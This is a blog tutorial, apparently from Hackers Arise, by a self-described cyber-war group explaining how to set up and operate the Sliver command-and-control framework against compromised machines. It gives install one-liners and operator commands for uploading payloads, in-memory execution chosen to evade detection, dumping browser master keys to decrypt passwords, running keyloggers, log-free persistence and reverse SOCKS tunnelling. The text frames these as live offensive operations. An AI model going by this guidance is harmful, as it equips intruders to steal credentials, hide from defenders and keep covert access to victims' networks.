Hello cyberwarriors. This series is about Sliver – a command and control (C2) framework actively used by us, the Cyber Cossacks, during the ongoing cyber war against Russia. We aim to show you the techniques and tactics we use and demonstrate how Sliver can become a powerful and reliable tool when used properly. At its […]
The post Sliver: Building a C2 During a Cyber War, Part 1 first appeared on Hackers Arise.
Hello cyberwarriors. This series is about Sliver – a command and control (C2) framework actively used by us, the Cyber Cossacks, during the ongoing cyber war against Russia. We aim to show you the techniques and tactics we use and demonstrate how Sliver can become a powerful and reliable tool when used properly.
At its core, a command and control server is software designed to execute commands or binaries on a remote machine, or even an entire network of machines. The main goal of a C2 is to provide centralized control, allowing an operator to manage multiple systems within a compromised environment. The operator is the person responsible for carrying out the attack and maintaining access. This access can be achieved in various ways, such as exploiting a SQL injection vulnerability, leveraging weak credentials on services like SSH or RDP, or gaining access to a system that already serves as a foothold within the target network.
Once this initial access is achieved, the C2 is used to generate a specialized executable file. After this file is delivered to the target machine, it creates a communication channel back to the C2 server when it is executed. From this point forward, we will refer to these executables as beacons.
Tmux
To use a C2 effectively, you need to master some Tmux basics. Tmux is a terminal multiplexer. It lets you run and manage multiple shell sessions inside a single SSH connection. Even if the connection drops, your sessions keep running. This is very useful in C2 setups because you can leave listeners, scripts, and pivot points running, organize your windows, split your screens for easier monitoring, and switch back and forth between tasks without losing progress.
Tmux is not only about keeping things running. It helps you organize your workflow by splitting your terminal window, naming sessions, and quickly switching between tasks. It keeps everything tidy and resilient, especially in long-running operations.
Setting Up Tmux
Start by installing it:
c2 > sudo apt install tmux
After installation, it’s good practice to configure Tmux to suit your needs. You’ll want to create a configuration file:
c2 > nano ~/.tmux.config
This configuration will extend your scrollback history so you can view older outputs. It will also prevent tmux from auto-renaming your windows, which is helpful when you’re dealing with a large number of windows. Additionally, the config will add custom hotkeys to help you join and send panes across windows and integrate basic Vim functionality – something that will come in handy later.
Sessions
Once your config is ready, apply it with the following command:
c2 > tmux source-file ~/.tmux.conf
Then start a new session:
c2 > tmux new -s sliver
Commands
Inside this session, you can begin splitting the window for multitasking. Most of our operators split their workspace into three or four panes depending on what they are monitoring. Tmux uses its own set of hotkeys, so you need to remember the prefix: Ctrl + B. After pressing and releasing the prefix, use “ to split the window horizontally and % to split it vertically. You can move between panes with the arrow keys after hitting the prefix.
Renaming Windows
To make it easier to manage your workspace, you can rename each window. This is done by pressing the prefix followed by a comma key, which allows you to assign a new name that reflects the task in that window.
Replace the given name with something task-related.
New Windows
When your workflow expands, and you need another full window, press the prefix (Ctrl + B) then c to create one. Use this new window to browse files or keep logs separate from your primary attack window.
Sending & Joining Panes
Your Tmux configuration should also support two important features such as sending and joining panes between windows. With your hotkeys configured, you can use prefix + s to send a pane to a different window, and prefix + j to join a pane from another window into your current view. These two commands make it easier to manage your terminal workspace efficiently.
Scrolling
When the output of a command is longer than your visible buffer, you can scroll up using prefix + [ and then use your arrow keys or mouse.
Copying Text
To copy text, press prefix + [, then Space to start selecting, use the arrows to highlight the desired content, and then press Enter to copy. The content is stored in the Tmux clipboard, not your system clipboard.
To paste, use prefix + ]. If you’re copying sensitive data like Kerberos tickets, it’s a good idea to save the data into a file and download it to your local machine using scp or wget.
Search
Vim integration also allows you to search through previous output. Activate scroll mode with prefix + [, then press / and type the keyword you’re looking for. For example, to find information about “roast” attacks, you could type roast and hit Enter. If you want to search from a specific point onward, scroll up to that point before searching.
Detaching
Sometimes you’ll need to detach from a session without closing it. This is useful if you’re switching to a different task or user session. To detach from your current Tmux session, press prefix + d. You can later reattach to the same session using tmux attach -t
Sliver
Now that you’ve set up Tmux and understand how to manage your environment, it’s time to install and configure Sliver. The setup is done in two stages. First you install the server and then the client.
Sliver Server
Install the server with this one-liner:
wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-server_linux; chmod +x ./sliver-server_linux; ./sliver-server_linux
The server will launch in a few seconds. Once it’s up and running, you’ll need to add a new operator. The operator name is your user identity within the Sliver ecosystem. You also need to define the IP address it will connect from. If you’re working locally, use 127.0.0.1. Before adding the operator, enable multiplayer mode. This will allow you to connect yourself and other operators if needed:
[server] sliver > multiplayer
[server] sliver > new-operator -n
Sliver Client
With the server ready, you can now set up the client. The client is what you will use to connect to your Sliver server. It can be installed on the same machine or on a separate one, depending on your setup. To install and start the client, run:
c2 > wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-client_linux; chmod +x ./sliver-client_linux; ./sliver-client_linux import overwatch_127.0.0.1.cfg; ./sliver-client_linux
Note that this one-liner includes the name of your config file, which will different from ours.
Once the client is connected, it’s time to work with Armory. Armory is Sliver’s built-in module management system. It allows you to add, update, and remove tools from your C2 environment without affecting the main program. Using Armory, you can view available modules, install the ones you need, update them individually or all at once, and remove any that you no longer want.
Armory
To see the available modules, use armory list. To install a specific module, use armory install
Armory has many tools, such as Seatbelt for checking Windows security configurations, Rubeus for working with Kerberos tickets, SharpHound for gathering information about Active Directory, and KrbRelayUp for executing Kerberos relay attacks. One of the most practical tools is Chisel, which allows you to set up a proxy tunnel through the compromised target. After installation, each tool becomes part of the Sliver environment and can be run like any built-in command. Be aware that these tools can be flagged by antivirus or EDR solutions.
Sliver Commands
Once your environment is ready, you should start learning the commands Sliver provides.
Help
The help command will display a complete list of available commands, including core Sliver functions, macro commands, third-party tools, and Windows-specific actions. There are too many to memorize at once, so it’s better to explore them gradually during real operations.
Sessions
To check your active sessions, use sessions. Over time, some sessions may go inactive or be lost. Use sessions prune to clean up dead sessions. If a connection drops, the implant will try to reconnect every two minutes by default.
Jobs
Another key feature is jobs, which displays active listeners and ports. If you don’t have any listeners running, your beacons won’t be able to communicate back to the C2.
Cat
Commands like cat can be extended with flags. Running cat -h shows available options. For example, you can use -X to save command output as loot, which is useful when dealing with sensitive or valuable files.
Loot
The loot command helps you manage stored credentials, files, and keys. It’s your internal database for stolen data.
Download & Upload
You will frequently use the upload and download commands to move payloads or retrieve data. Be cautious with large files – anything over 100 MB might destabilize your session. Here’s how you use these commands with a Windows target:
sliver > upload /root/payloads/payload.exe C:\\Windows\\Temp\\payload.exe
sliver > download C:\\Windows\\Temp\\Bloodhound.zip /root/target/BH.zip
Execute-Assembly
A particularly powerful command is execute-assembly. It runs executables or DLLs directly in memory on the target machine, bypassing disk access entirely. This makes detection much harder. Use this to run tools like Seatbelt, SharpHound, or your own custom C# payloads.
To run DLLs or executables in memory type this:
sliver > execute-assembly /path/to/assembly
Extensions
The extensions category contains specialized commands. For example, sa-list_firewall_rules can show you what rules are configured on the target.
You can also dump browser master keys using chromiumkeydump, which is essential for decrypting saved passwords.
Keyloggers can be started to catch credentials when users log into services. For this you have raw-keylogger
For persistence, remote-ghost_task allows you to schedule tasks quietly without generating logs.
Chisel
Finally, Chisel allows you to create a stable proxy. Start the server:
c2 > ./sliver server –reverse -v -p 1257 –socks5
Then, from the beaconed target, run:
sliver (session) > chisel client -v
Make sure port 1080 is free for the proxy, as Chisel uses it by default.
Conclusion
This article laid the groundwork for setting up and using Sliver effectively in offensive operations. We started with the essential Tmux setup to organize your work environment and moved into the full configuration of both the Sliver server and client. You learned how to use Armory to extend your capabilities and were introduced to Sliver’s core commands, including session handling, file transfers, in-memory payload execution, and persistence options. Sliver is more than just a basic C2, it’s a modular, adaptable, and powerful platform for modern engagements. Mastering its tools and functions will allow you to carry out full-scale operations without depending on external utilities.
The post Sliver: Building a C2 During a Cyber War, Part 1 first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/sliver-building-a-c2-during-a-cyber-war-part-1/